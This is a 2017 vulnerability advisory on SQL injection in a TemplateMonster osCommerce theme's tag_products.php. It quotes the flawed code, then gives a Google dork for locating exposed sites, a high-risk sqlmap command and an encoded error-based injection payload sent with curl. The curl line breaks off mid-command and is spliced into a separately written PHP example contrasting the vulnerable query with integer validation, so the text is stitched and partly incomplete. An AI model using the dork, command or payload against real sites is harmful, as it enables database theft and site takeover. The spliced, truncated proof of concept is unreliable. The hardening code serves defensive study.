[+]---------------------------------------------------------[+]
| Vulnerable Software: TemplateMonster osCommerce           |
| Vendor: http://templatemonster.org                        |
| Vulnerability Type: Error-based SQL Injection             |
| Date Released: 23/04/2017                                 |
| Released by: Project Insecurity (@insecurity)             |
[+]---------------------------------------------------------[+]

TemplateMonster is a site that makes templates for various content management systems. There are severe SQL injection issues in their template for the popular CMS 'osCommerce'; this can lead to a complete system compromise of any site using this template. An estimated 70k-100k sites are vulnerable, although not that many are indexed on Google.

This source appears to be a developer from TemplateMonster releasing the source code publicly instead of forcing users to pay for it. The source is vulnerable to SQL injection in the tag_products.php file:
https://github.com/templatemonster/oscommerce/blob/master/theme/tag_products.php

The code for this file can be seen below:
-------------------------------------------------------------------------------------------------------------
$tag_id = $HTTP_GET_VARS['id_tag'];
$tag_text = "";
$tags_query = tep_db_query("select * from " . TABLE_TAGS . " where tag_id='" . $tag_id . "'");
while ($tags_result = tep_db_fetch_array($tags_query)) {
    $tag_text = urldecode($tags_result['tag_text']);
}
-------------------------------------------------------------------------------------------------------------
As you can see above, the value of the id_tag GET parameter is concatenated straight into the SQL statement without any escaping or validation, so any value is accepted.

Basic PoC of how exploitation would take place using SQLMap + cURL (and html2text for sorting):
-------------------------------------------------------------------------------------------------------------
#OsCommerce TemplateMonster ERROR BASED SQL Injection Vulnerability Checker & Exploiter
#Google Dork: inurl:tag_products inurl:id_tag -github
#Sqlmap Command: python sqlmap.py -u http://localhost/tag_products.php?id_tag=6 --dbms=MYSQL --random-agent --level=5 --risk=3 --threads=10 --test-filter=FLOOR
#Requirements: curl, html2text, grep, head
#curl -s http://localhost/tag_products.php?id_tag=9%20%20AND%20%28SELECT%206354%20FROM%28SELECT%20COUNT%28%2a%29%2CCONCAT%28%28SELECT%20%28ELT%286354%3D6354%2C1%29%29%29%2CFLOOR%28RAND%280%29%2a2%29%29x%20FROM%20INFORMATION_SCHEMA.plugins%20GROUP%20BY%20x%29a%29 |grep "
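The following is an added example, not code from the TemplateMonster theme or from osCommerce, showing the query construction from tag_products.php above next to a hardened version. tep_db_query() and TABLE_TAGS are osCommerce names; to keep the script runnable offline, the functions here only build and return the SQL string, and the table name is an assumed constant. The sample inputs are constructed.

```php
<?php
// Added example: vulnerable vs. hardened handling of the id_tag parameter.
// build-only: no database connection, just the SQL text that would be sent.

define('TABLE_TAGS', 'tags'); // assumed value; the real constant comes from the osCommerce config

// Vulnerable form (same shape as tag_products.php): raw GET value concatenated into the query.
function vulnerable_tags_sql(array $get): string
{
    $tag_id = $get['id_tag'] ?? '';
    return "select * from " . TABLE_TAGS . " where tag_id='" . $tag_id . "'";
}

// Hardened form: tag_id is a numeric key, so accept only a plain decimal integer.
// Anything else (quotes, spaces, SQL keywords, empty string) is rejected before
// it can reach the query builder. Returns null when the value is not acceptable.
function tag_id_from_request(array $get): ?int
{
    if (!isset($get['id_tag']) || !is_string($get['id_tag'])) {
        return null;
    }
    $raw = $get['id_tag'];
    // ctype_digit() is true only for a non-empty string made of 0-9; the length
    // cap keeps oversized values away from the integer cast.
    if (strlen($raw) > 10 || !ctype_digit($raw)) {
        return null;
    }
    return (int) $raw;
}

function hardened_tags_sql(array $get): ?string
{
    $tag_id = tag_id_from_request($get);
    if ($tag_id === null) {
        return null; // caller should answer 400/404 and log the rejected value for detection
    }
    // $tag_id is now an int, so the interpolated text can only ever be digits.
    return "select * from " . TABLE_TAGS . " where tag_id='" . $tag_id . "'";
}

// Constructed sample requests: one legitimate, three that must be rejected.
$samples = [
    ['id_tag' => '6'],
    ['id_tag' => "6' OR '1'='1"],
    ['id_tag' => '12abc'],
    ['id_tag' => ''],
];

foreach ($samples as $get) {
    echo "input: " . var_export($get['id_tag'], true) . PHP_EOL;
    echo "  vulnerable: " . vulnerable_tags_sql($get) . PHP_EOL;
    $safe = hardened_tags_sql($get);
    echo "  hardened:   " . ($safe === null ? '(rejected)' : $safe) . PHP_EOL;
}
```

Run with `php` on the command line: only the first sample produces a query in the hardened path, while the vulnerable path happily emits the injected text. Validating to an integer is the right fix for a numeric key; for genuinely string-valued parameters osCommerce's tep_db_input() escaping helper (or a parameterised query where the database layer supports it) should be used instead of concatenation. Rejected values are also a cheap detection signal: logging them with the client address flags scanning of this parameter early.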